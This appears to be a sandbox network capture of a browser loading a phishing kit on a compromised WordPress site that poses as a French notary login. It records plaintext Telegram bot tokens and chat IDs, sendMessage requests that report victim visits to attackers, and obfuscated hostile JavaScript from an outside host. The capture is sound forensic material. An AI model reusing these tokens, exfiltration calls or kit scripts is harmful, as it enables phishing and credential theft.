                        2024-08-30 22:35:43 UTC1378INData Raw: 2e 70 75 73 68 28 22 5b 2a 5e 24 5d 3d 22 2b 4b 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4b 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 4a 2b 22 29 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 75 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 7e 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 75 2b 22 2b 2a 22 29 2e
                        Data Ascii: .push("[*^$]="+K+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+K+"*(?:value|"+J+")"),a.querySelectorAll("[id~="+u+"-]").length||q.push("~="),a.querySelectorAll(":checked").length||q.push(":checked"),a.querySelectorAll("a#"+u+"+*").
                        2024-08-30 22:35:43 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                        Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.44975588.212.10.204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:43 UTC407OUTGET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/telegram.js HTTP/1.1
                        Host: www.askozvar.sk
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:43 UTC289INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:43 GMT
                        Server: Apache
                        Upgrade: h2
                        Connection: Upgrade, close
                        Last-Modified: Sun, 25 Aug 2024 16:54:06 GMT
                        ETag: "78-62084db394780"
                        Accept-Ranges: bytes
                        Content-Length: 120
                        Vary: Accept-Encoding
                        Content-Type: application/javascript
                        2024-08-30 22:35:43 UTC120INData Raw: 76 61 72 20 74 65 6c 65 67 72 61 6d 43 6f 6e 66 69 67 20 3d 20 7b 0d 0a 20 20 20 20 62 6f 74 54 6f 6b 65 6e 3a 20 27 37 34 37 36 32 39 34 37 30 31 3a 41 41 48 70 30 49 6d 69 73 63 5f 59 67 37 51 66 42 57 50 61 79 58 36 49 6b 69 55 74 42 59 79 7a 6e 74 51 27 2c 0d 0a 20 20 20 20 63 68 61 74 49 44 3a 20 27 2d 34 32 37 39 35 34 37 35 34 34 27 0d 0a 7d 3b 0d 0a
                        Data Ascii: var telegramConfig = { botToken: '7476294701:AAHp0Imisc_Yg7QfBWPayX6IkiUtBYyzntQ', chatID: '-4279547544'};


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.44975888.212.10.204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:43 UTC714OUTGET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/1.png HTTP/1.1
                        Host: www.askozvar.sk
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: image
                        Referer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:44 UTC349INHTTP/1.1 404 Not Found
                        Date: Fri, 30 Aug 2024 22:35:44 GMT
                        Server: Apache
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Link: <https://www.askozvar.sk/wp-json/>; rel="https://api.w.org/"
                        Upgrade: h2
                        Connection: Upgrade, close
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=UTF-8
                        2024-08-30 22:35:44 UTC6INData Raw: 32 30 30 30 0d 0a
                        Data Ascii: 2000
                        2024-08-30 22:35:44 UTC8192INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 73 6b 2d 53 4b 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d
                        Data Ascii: <!DOCTYPE html><html lang="sk-SK"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><!-
                        2024-08-30 22:35:44 UTC2INData Raw: 0d 0a
                        Data Ascii:
                        2024-08-30 22:35:44 UTC6INData Raw: 32 30 30 30 0d 0a
                        Data Ascii: 2000


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.44975734.87.236.724433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:43 UTC529OUTGET /style/10.js HTTP/1.1
                        Host: dancinggorillas.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: script
                        Referer: https://www.askozvar.sk/
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:44 UTC220INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:44 GMT
                        Server: Apache
                        Last-Modified: Fri, 14 Jun 2024 01:09:48 GMT
                        Accept-Ranges: bytes
                        Content-Length: 20279
                        Connection: close
                        Content-Type: application/javascript
                        2024-08-30 22:35:44 UTC7972INData Raw: 2f 2a 0d 0a 20 2a 20 6a 71 75 65 72 79 2e 63 6f 75 6e 74 64 6f 77 6e 54 69 6d 65 72 2e 6d 69 6e 2e 6a 73 20 31 2e 30 2e 38 0d 0a 20 2a 20 41 75 74 68 6f 72 20 2d 20 48 61 72 73 68 65 6e 20 41 6d 61 72 6e 61 74 68 20 50 61 6e 64 65 79 0d 0a 20 2a 20 56 65 72 73 69 6f 6e 20 2d 20 31 2e 30 2e 38 0d 0a 20 2a 20 52 65 6c 65 61 73 65 20 2d 20 31 38 74 68 20 41 70 72 69 6c 20 32 30 31 35 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 34 20 2d 20 32 30 31 38 20 48 61 72 73 68 65 6e 20 50 61 6e 64 65 79 0d 0a 2a 2f 0d 0a 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 63 29 7b 76 61 72 20 53 3d 6e 2e 65 78 74 65 6e 64 28 7b 7d 2c 6e 2e 66 6e 2e 63 6f 75 6e 74 64 6f 77 6e 74 69 6d 65 72 2e 64 65 66 61 75 6c 74
                        Data Ascii: /* * jquery.countdownTimer.min.js 1.0.8 * Author - Harshen Amarnath Pandey * Version - 1.0.8 * Release - 18th April 2015 * Copyright (c) 2014 - 2018 Harshen Pandey*/!function(n){function t(t,c){var S=n.extend({},n.fn.countdowntimer.default
                        2024-08-30 22:35:44 UTC8000INData Raw: 65 6e 67 74 68 3c 32 26 26 28 77 69 6e 64 6f 77 5b 22 73 65 63 6f 6e 64 73 5f 53 22 2b 65 5d 3d 22 30 22 2b 77 69 6e 64 6f 77 5b 22 73 65 63 6f 6e 64 73 5f 53 22 2b 65 5d 29 2c 53 28 6e 2c 77 69 6e 64 6f 77 5b 22 73 65 63 6f 6e 64 73 5f 53 22 2b 65 5d 2b 22 20 73 65 63 22 29 2c 77 69 6e 64 6f 77 5b 22 73 65 63 6f 6e 64 73 5f 53 22 2b 65 5d 2d 3d 74 2e 74 69 63 6b 49 6e 74 65 72 76 61 6c 2c 77 69 6e 64 6f 77 5b 22 73 65 63 6f 6e 64 73 5f 53 22 2b 65 5d 3c 30 26 26 28 64 65 6c 65 74 65 20 77 69 6e 64 6f 77 5b 22 68 6f 75 72 73 5f 53 22 2b 65 5d 2c 64 65 6c 65 74 65 20 77 69 6e 64 6f 77 5b 22 6d 69 6e 75 74 65 73 5f 53 22 2b 65 5d 2c 64 65 6c 65 74 65 20 77 69 6e 64 6f 77 5b 22 73 65 63 6f 6e 64 73 5f 53 22 2b 65 5d 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c
                        Data Ascii: ength<2&&(window["seconds_S"+e]="0"+window["seconds_S"+e]),S(n,window["seconds_S"+e]+" sec"),window["seconds_S"+e]-=t.tickInterval,window["seconds_S"+e]<0&&(delete window["hours_S"+e],delete window["minutes_S"+e],delete window["seconds_S"+e],clearInterval
                        2024-08-30 22:35:44 UTC4307INData Raw: 63 6f 6e 64 73 28 77 69 6e 64 6f 77 5b 22 73 74 61 72 74 44 61 74 65 22 2b 6f 5d 2e 67 65 74 53 65 63 6f 6e 64 73 28 29 2b 74 2e 74 69 63 6b 49 6e 74 65 72 76 61 6c 29 29 3a 28 53 28 6e 2c 22 30 30 22 2b 74 2e 74 69 6d 65 53 65 70 61 72 61 74 6f 72 2b 22 30 30 22 2b 74 2e 74 69 6d 65 53 65 70 61 72 61 74 6f 72 2b 22 30 30 22 2b 74 2e 74 69 6d 65 53 65 70 61 72 61 74 6f 72 2b 22 30 30 22 29 2c 22 77 69 74 68 6e 6f 53 74 61 72 74 22 3d 3d 65 3f 28 64 65 6c 65 74 65 20 77 69 6e 64 6f 77 5b 22 64 61 74 65 54 69 6d 65 22 2b 6f 5d 2c 64 65 6c 65 74 65 20 77 69 6e 64 6f 77 5b 22 73 74 61 72 74 54 69 6d 65 22 2b 6f 5d 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 77 69 6e 64 6f 77 5b 22 74 69 6d 65 72 5f 67 69 76 65 6e 44 61 74 65 22 2b 6f 5d 29 29 3a 22 77 69 74
                        Data Ascii: conds(window["startDate"+o].getSeconds()+t.tickInterval)):(S(n,"00"+t.timeSeparator+"00"+t.timeSeparator+"00"+t.timeSeparator+"00"),"withnoStart"==e?(delete window["dateTime"+o],delete window["startTime"+o],clearInterval(window["timer_givenDate"+o])):"wit


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.449759149.154.167.2204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:44 UTC755OUTGET /bot69272958987:AAFFDSiV1sre7Hfr4o84UfSX2g3XwVHFbZPfzU/sendMessage?chat_id=-40519456006&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html HTTP/1.1
                        Host: api.telegram.org
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Origin: https://www.askozvar.sk
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Referer: https://www.askozvar.sk/
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:44 UTC347INHTTP/1.1 401 Unauthorized
                        Server: nginx/1.18.0
                        Date: Fri, 30 Aug 2024 22:35:44 GMT
                        Content-Type: application/json
                        Content-Length: 58
                        Connection: close
                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                        Access-Control-Allow-Origin: *
                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                        2024-08-30 22:35:44 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                        Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.449760149.154.167.2204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:44 UTC786OUTGET /bot608367094314:AAGSbz4P642cuuaj_d54rlDQEtxWui_xUOgw/sendMessage?chat_id=63308924057&text=New_Link%3A%20http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html%2FX911%2Fstyle.php HTTP/1.1
                        Host: api.telegram.org
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Origin: https://www.askozvar.sk
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Referer: https://www.askozvar.sk/
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:44 UTC347INHTTP/1.1 401 Unauthorized
                        Server: nginx/1.18.0
                        Date: Fri, 30 Aug 2024 22:35:44 GMT
                        Content-Type: application/json
                        Content-Length: 58
                        Connection: close
                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                        Access-Control-Allow-Origin: *
                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                        2024-08-30 22:35:44 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                        Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.449762184.28.90.27443
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:44 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        Accept-Encoding: identity
                        User-Agent: Microsoft BITS/7.8
                        Host: fs.microsoft.com
                        2024-08-30 22:35:44 UTC466INHTTP/1.1 200 OK
                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                        Content-Type: application/octet-stream
                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                        Server: ECAcc (lpl/EF06)
                        X-CID: 11
                        X-Ms-ApiVersion: Distribute 1.2
                        X-Ms-Region: prod-weu-z1
                        Cache-Control: public, max-age=39669
                        Date: Fri, 30 Aug 2024 22:35:44 GMT
                        Connection: close
                        X-CID: 2


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.44976534.87.236.724433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:45 UTC358OUTGET /style/pdf_fr.js HTTP/1.1
                        Host: dancinggorillas.com
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:45 UTC219INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:45 GMT
                        Server: Apache
                        Last-Modified: Sun, 05 Nov 2023 17:54:44 GMT
                        Accept-Ranges: bytes
                        Content-Length: 4988
                        Connection: close
                        Content-Type: application/javascript
                        2024-08-30 22:35:45 UTC4988INData Raw: 76 61 72 20 5f 30 78 65 65 38 61 33 36 3d 5f 30 78 32 65 31 38 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 61 35 32 33 66 2c 5f 30 78 34 31 65 35 65 65 29 7b 76 61 72 20 5f 30 78 35 33 39 63 39 32 3d 5f 30 78 32 65 31 38 2c 5f 30 78 35 62 30 30 36 35 3d 5f 30 78 33 61 35 32 33 66 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 31 36 39 39 36 65 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 33 39 63 39 32 28 30 78 31 63 30 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 33 39 63 39 32 28 30 78 31 63 37 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 33 39 63 39 32 28 30 78 31 63 62 29 29 2f 30 78 33 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 33 39 63 39 32 28 30 78 31 62 64 29 29 2f 30 78 34 2b 2d 70
                        Data Ascii: var _0xee8a36=_0x2e18;(function(_0x3a523f,_0x41e5ee){var _0x539c92=_0x2e18,_0x5b0065=_0x3a523f();while(!![]){try{var _0x16996e=parseInt(_0x539c92(0x1c0))/0x1*(parseInt(_0x539c92(0x1c7))/0x2)+parseInt(_0x539c92(0x1cb))/0x3+parseInt(_0x539c92(0x1bd))/0x4+-p


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.2.449766149.154.167.2204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:45 UTC750OUTGET /bot1416352134:AAFTVfZ2N0K89fqi-wxFyFyVZrT94rB4fDE/sendMessage?chat_id=-4243763425&text=http%3A%2F%2Fwww.askozvar.sk%2Fwp-admin%2Fmaint%2Fconnexion.idnot.fr-user-auth-dologin%2FDocument-Confidentiel-pdf.html HTTP/1.1
                        Host: api.telegram.org
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Origin: https://www.askozvar.sk
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Referer: https://www.askozvar.sk/
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:45 UTC388INHTTP/1.1 200 OK
                        Server: nginx/1.18.0
                        Date: Fri, 30 Aug 2024 22:35:45 GMT
                        Content-Type: application/json
                        Content-Length: 428
                        Connection: close
                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                        2024-08-30 22:35:45 UTC428INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 31 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 34 31 36 33 35 32 31 33 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 79 20 6c 6f 76 65 72 20 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 58 72 65 73 75 6c 74 65 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 34 33 37 36 33 34 32 35 2c 22 74 69 74 6c 65 22 3a 22 46 6f 72 20 4c 69 6e 6b 73 20 53 68 65 65 74 73 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 35 30 35
                        Data Ascii: {"ok":true,"result":{"message_id":410121,"from":{"id":1416352134,"is_bot":true,"first_name":"Gay lover bot","username":"Xresultes_bot"},"chat":{"id":-4243763425,"title":"For Links Sheets","type":"group","all_members_are_administrators":true},"date":172505


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.2.44976888.212.10.204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:45 UTC668OUTGET /favicon.ico HTTP/1.1
                        Host: www.askozvar.sk
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: image
                        Referer: https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.html
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:46 UTC366INHTTP/1.1 302 Found
                        Date: Fri, 30 Aug 2024 22:35:45 GMT
                        Server: Apache
                        Link: <https://www.askozvar.sk/wp-json/>; rel="https://api.w.org/"
                        X-Redirect-By: WordPress
                        Upgrade: h2
                        Connection: Upgrade, close
                        Location: https://www.askozvar.sk/wp-content/uploads/2019/06/cropped-zvaracaskozvar-1-32x32.png
                        Content-Length: 0
                        Content-Type: text/html; charset=UTF-8


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.2.449769184.28.90.27443
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:45 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        Accept-Encoding: identity
                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                        Range: bytes=0-2147483646
                        User-Agent: Microsoft BITS/7.8
                        Host: fs.microsoft.com
                        2024-08-30 22:35:45 UTC514INHTTP/1.1 200 OK
                        ApiVersion: Distribute 1.1
                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                        Content-Type: application/octet-stream
                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                        Server: ECAcc (lpl/EF06)
                        X-CID: 11
                        X-Ms-ApiVersion: Distribute 1.2
                        X-Ms-Region: prod-weu-z1
                        Cache-Control: public, max-age=39621
                        Date: Fri, 30 Aug 2024 22:35:45 GMT
                        Content-Length: 55
                        Connection: close
                        X-CID: 2
                        2024-08-30 22:35:45 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.2.44976734.87.236.724433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:45 UTC354OUTGET /style/10.js HTTP/1.1
                        Host: dancinggorillas.com
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:46 UTC220INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:46 GMT
                        Server: Apache
                        Last-Modified: Fri, 14 Jun 2024 01:09:48 GMT
                        Accept-Ranges: bytes
                        Content-Length: 20279
                        Connection: close
                        Content-Type: application/javascript
